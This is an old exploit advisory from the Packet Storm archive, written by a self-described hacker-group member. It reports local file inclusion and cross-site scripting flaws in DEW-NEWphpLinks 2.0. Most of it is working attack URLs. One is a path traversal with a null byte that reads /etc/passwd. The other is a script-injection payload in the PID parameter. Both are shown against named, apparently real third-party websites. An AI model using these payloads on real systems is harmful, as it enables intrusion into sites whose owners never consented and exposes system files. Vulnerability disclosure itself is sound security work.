DEW-NEWphpLinks version 2.0 suffers from local file inclusion and cross site scripting vulnerabilities.
d82381f3e79bb124a96e9625bd1392b6f7608b4f44c15e2ff326354e9adfd097[~]------------------------------------------------------------------------------------------------
[~] DEW-NEWphpLinks 2.0 (LFI/XSS) Multiple Remote Vulnerabilities
[~]
[~] http://www.dew-code.com
[~]
[~]
[~]
-----------------------------------------------------------------------------------------------
[~] Bug founded by d3v1l [Avram Marius]
[~]
[~] Date: 25.04.2009
[~]
[~]
[~] d3v1l@spoofer.com http://security-sh3ll.com
[~]
[~]
------------------------------------------------------------------------------------------------
[~] Greetz tO ALL:-
[~]
[~] Security-Shell Members(
https://security-shell.ws/forum.php)-(http://security-sh3ll.blogspot.com)
[~]
[~] milw0rm staff
[~]-------------------------------------------------------------------------------------------------
[~] Exploit :- LFI - index.php?show=
[~]
[~] http://site.com/index.php?show=../../../../../../etc/passwd%00
[~]
[~] Ex :-
[~]
[~]
http://www.customprintedsweatshirts.com/links/index.php?show=../../../../../../etc/passwd%00
[~]
http://directory.custom-printed-t-shirts.com/index.php?show=../../../../../../etc/passwd%00
[~]-------------------------------------------------------------------------------------------------
[~] XSS on search module works fine on ALL version
[~]
[~] Ex :- XSS - index.php?PID=
[~]
[~] http://directory.custom-printed-t-shirts.com/index.php?PID=
"><script>alert("test")</script>
[~] http://www.customprintedsweatshirts.com/links/index.php?PID=
"><script>alert("test")</script>
[~]-------------------------------------------------------------------------------------------------
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed